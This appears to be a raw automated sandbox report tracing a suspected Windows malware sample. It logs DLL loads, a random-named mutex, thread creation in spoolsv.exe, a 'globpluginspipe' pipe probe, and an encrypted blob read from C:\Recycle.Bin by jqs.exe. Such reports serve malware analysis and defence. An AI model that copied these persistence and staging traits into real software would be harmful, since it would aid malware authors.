Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326999990
System info queried Type: BasicInformation success or wait 2327000811
System info queried Type: ProcessorInformation success or wait 2327001112
System info queried Type: BasicInformation success or wait 2327003830
System info queried Type: ProcessorInformation success or wait 2327004123
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327004538
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2327005650
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2327006313
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2327006628
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2327007502
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2327008378
System info queried Type: BasicInformation success or wait 2327009195
System info queried Type: ProcessorInformation success or wait 2327009495
System info queried Type: BasicInformation success or wait 2327012310
System info queried Type: ProcessorInformation success or wait 2327012627
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327013042
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2327014172
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2327014848
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2327015168
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2327016050
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2327016932
System info queried Type: BasicInformation success or wait 2327017773
System info queried Type: ProcessorInformation success or wait 2327018113
System info queried Type: BasicInformation success or wait 2327020456
System info queried Type: ProcessorInformation success or wait 2327020754
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327021207
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2327022417
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2327023141
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2327023464
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2327024539
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2327025493
System info queried Type: BasicInformation success or wait 2327026373
System info queried Type: ProcessorInformation success or wait 2327026717
System info queried Type: BasicInformation success or wait 2327029586
System info queried Type: ProcessorInformation success or wait 2327029880
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327030296
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2327031480
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2327032295
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2327032614
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2327033772
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2327034675
System info queried Type: BasicInformation success or wait 2327035520
System info queried Type: ProcessorInformation success or wait 2327035820
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2327038041
Thread created PID: 1496 TID: 3428 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2327039749
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2327057090
Thread delayed Time: 0 TID: 13312 success or wait 2327209775
Thread delayed Time: 0 TID: 13312 success or wait 2327264651
Thread delayed Time: 0 TID: 13312 success or wait 2327265142
Thread delayed Time: 0 TID: 13312 success or wait 2328327305
Thread delayed Time: 0 TID: 13312 success or wait 2328382888
Thread delayed Time: 0 TID: 13312 success or wait 2328383061
Thread delayed Time: 0 TID: 13312 success or wait 2329445828
Thread delayed Time: 0 TID: 13312 success or wait 2329504006
Thread delayed Time: 0 TID: 13312 success or wait 2329504178
Thread delayed Time: 0 TID: 13312 success or wait 2330565604
Thread delayed Time: 0 TID: 13312 success or wait 2330623626
Thread delayed Time: 0 TID: 13312 success or wait 2330624130
Thread delayed Time: 0 TID: 13312 success or wait 2331684321
Thread delayed Time: 0 TID: 13312 success or wait 2331739052
Thread delayed Time: 0 TID: 13312 success or wait 2331739586
Thread delayed Time: 0 TID: 13312 success or wait 2332802906
Thread delayed Time: 0 TID: 13312 success or wait 2332857671
Thread delayed Time: 0 TID: 13312 success or wait 2332858182
Thread delayed Time: 0 TID: 13312 success or wait 2333921462
Thread delayed Time: 0 TID: 13312 success or wait 2333979290
Thread delayed Time: 0 TID: 13312 success or wait 2333979804
Thread delayed Time: 0 TID: 13312 success or wait 2335042745
Thread delayed Time: 0 TID: 13312 success or wait 2335094861
Thread delayed Time: 0 TID: 13312 success or wait 2335095368
Thread delayed Time: 0 TID: 13312 success or wait 2336158694
Thread delayed Time: 0 TID: 13312 success or wait 2336213482
Thread delayed Time: 0 TID: 13312 success or wait 2336213999
Thread delayed Time: 0 TID: 13312 success or wait 2337276893
Thread delayed Time: 0 TID: 13312 success or wait 2337331739
Thread delayed Time: 0 TID: 13312 success or wait 2337332240
Thread delayed Time: 0 TID: 13312 success or wait 2338398897
Thread delayed Time: 0 TID: 13312 success or wait 2338450325
Thread delayed Time: 0 TID: 13312 success or wait 2338450824
Thread delayed Time: 0 TID: 13312 success or wait 2339514594
Thread delayed Time: 0 TID: 13312 success or wait 2339571958
Thread delayed Time: 0 TID: 13312 success or wait 2339572471
Thread delayed Time: 0 TID: 13312 success or wait 2340631988
Thread delayed Time: 0 TID: 13312 success or wait 2340687546
Thread delayed Time: 0 TID: 13312 success or wait 2340687722
Thread delayed Time: 0 TID: 13312 success or wait 2341750610
Thread delayed Time: 0 TID: 13312 success or wait 2341806182
Thread delayed Time: 0 TID: 13312 success or wait 2341806359
Thread delayed Time: 0 TID: 13312 success or wait 2342870572
Thread delayed Time: 0 TID: 13312 success or wait 2342928663
Thread delayed Time: 0 TID: 13312 success or wait 2342929170
Thread delayed Time: 0 TID: 13312 success or wait 2343988895
Thread delayed Time: 0 TID: 13312 success or wait 2344043784
Sections
+ General
Start time: 05:48:11
Start date: 01/12/2011
Path: C:\WINDOWS\system32\ctfmon.exe
Commandline: C:\WINDOWS\system32\ctfmon.exe
Imagebase: 0x400000
File size: 15360 bytes
MD5 hash: 5F1D5F88303D4A4DBC8E5F97BA967CC3
Chronological sections
Operation Data Completion Time
Sections
+ General
Start time: 05:48:11
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k LocalService
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
Chronological sections
Operation Data Completion Time
+ Sections
+ General
Start time: 05:48:12
Start date: 01/12/2011
Path: C:\Program Files\Java\jre6\bin\jqs.exe
Commandline: C:\Program Files\Java\jre6\bin\jqs.exe -service -config C:\Program Files\Java\jre6\lib\deploy\jqs\jqs.conf
Imagebase: 0x400000
File size: 153376 bytes
MD5 hash: 5E06A9D23727DAF96FAA796F1135FDCD
File Activities:
+ File opened
File Path | Access | Options | Content overwritten | Completion | Count | Source Address
C:\WINDOWS\system32\ntdll.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 5 | BAD6A36
C:\Recycle.Bin\07A49F015E0D693 | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | success or wait | 2 | BAF4E4E
C:\WINDOWS\system32\USER32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
C:\WINDOWS\system32\WININET.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 11 | BAD6A36
C:\WINDOWS\system32\WS2_32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
C:\WINDOWS\system32\CRYPT32.dll | read attributes and synchronize and generic read | synchronous io non alert and non directory file and random access | false | success or wait | 1 | BAD6A36
\pipe\globpluginspipe | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | object name not found | 3 | BADD812
+ File read
File Path | Offset | Length | Value | Completion | Count | Source Address
C:\Recycle.Bin\07A49F015E0D693 | none | 5934 | 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 | success or wait | 2 | BAE818F
C:\WINDOWS\system32\user32.dll | none | 4 | D8 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\user32.dll | none | 20 | 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
C:\WINDOWS\system32\wininet.dll | none | 4 | F8 00 00 00 | success or wait | 11 | BAD6699
C:\WINDOWS\system32\wininet.dll | none | 20 | 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 | success or wait | 11 | BAD66D5
C:\WINDOWS\system32\ws2_32.dll | none | 4 | F0 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\ws2_32.dll | none | 20 | 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
C:\WINDOWS\system32\advapi32.dll | none | 4 | F0 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\advapi32.dll | none | 20 | 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
C:\WINDOWS\system32\crypt32.dll | none | 4 | F0 00 00 00 | success or wait | 1 | BAD6699
C:\WINDOWS\system32\crypt32.dll | none | 20 | 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 | success or wait | 1 | BAD66D5
Section Activities:
+ Section loaded by Windows
File Path | Access | Type | Base | Size | Mapped to pid | Protection | Completion | Count
C:\Program Files\Java\jre6\bin\client\classes.jsa | query and read | commit | 11B0000 | 13369344 | own pid | readonly | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 3DFD0000 | 2002944 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 22A0000 | 77824 | own pid | readonly | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\awt.dll | write and read and execute | commit | 10B0000 | 1208320 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\awt.dll | query and write and read and execute | image | 6D000000 | 1351680 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D000000 | 1351680 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\client\jvm.dll | write and read and execute | commit | 10B0000 | 2695168 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\client\jvm.dll | query and write and read and execute | image | 6D7F0000 | 2777088 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D7F0000 | 2777088 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\dcpr.dll | write and read and execute | commit | 10B0000 | 143360 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\dcpr.dll | query and write and read and execute | image | 6D1A0000 | 143360 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D1A0000 | 143360 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\deploy.dll | write and read and execute | commit | 10B0000 | 77824 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\deploy.dll | query and write and read and execute | image | 6D1D0000 | 77824 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D1D0000 | 77824 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\fontmanager.dll | write and read and execute | commit | 10B0000 | 323584 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\fontmanager.dll | query and write and read and execute | image | 6D230000 | 323584 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D230000 | 323584 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\hpi.dll | write and read and execute | commit | 10B0000 | 16384 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\hpi.dll | query and write and read and execute | image | 6D280000 | 32768 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D280000 | 32768 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\java.dll | write and read and execute | commit | 10B0000 | 126976 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\java.dll | query and write and read and execute | image | 6D320000 | 126976 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D320000 | 126976 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\javaw.exe | write and read and execute | commit | 10B0000 | 147456 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\javaw.exe | query and write and read and execute | image | 10B0000 | 147456 | own pid | read write | conflicting addresses | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 10B0000 | 147456 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\jp2native.dll | write and read and execute | commit | 10B0000 | 8192 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\jp2native.dll | query and write and read and execute | image | 6D420000 | 24576 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D420000 | 24576 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\jpeg.dll | write and read and execute | commit | 10B0000 | 151552 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\jpeg.dll | query and write and read and execute | image | 6D440000 | 151552 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D440000 | 151552 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\net.dll | write and read and execute | commit | 10B0000 | 77824 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\net.dll | query and write and read and execute | image | 6D600000 | 77824 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D600000 | 77824 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\nio.dll | write and read and execute | commit | 10B0000 | 20480 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\nio.dll | query and write and read and execute | image | 6D620000 | 36864 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D620000 | 36864 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\regutils.dll | write and read and execute | commit | 10B0000 | 278528 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\regutils.dll | query and write and read and execute | image | 6D6A0000 | 286720 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D6A0000 | 286720 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\verify.dll | write and read and execute | commit | 10B0000 | 32768 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\verify.dll | query and write and read and execute | image | 6D7A0000 | 49152 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D7A0000 | 49152 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\zip.dll | write and read and execute | commit | 10B0000 | 49152 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\zip.dll | query and write and read and execute | image | 6D7E0000 | 61440 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D7E0000 | 61440 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\client\classes.jsa | query and read | commit | 10B0000 | 13369344 | own pid | readonly | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 10B0000 | 13369344 | own pid | readonly | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\awt.dll | write and read and execute | commit | 10B0000 | 1208320 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\awt.dll | query and write and read and execute | image | 6D000000 | 1351680 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D000000 | 1351680 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\client\jvm.dll | write and read and execute | commit | 10B0000 | 2695168 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\client\jvm.dll | query and write and read and execute | image | 6D7F0000 | 2777088 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D7F0000 | 2777088 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\dcpr.dll | write and read and execute | commit | 10B0000 | 143360 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\dcpr.dll | query and write and read and execute | image | 6D1A0000 | 143360 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D1A0000 | 143360 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\deploy.dll | write and read and execute | commit | 10B0000 | 77824 | own pid | execute | success or wait | 1
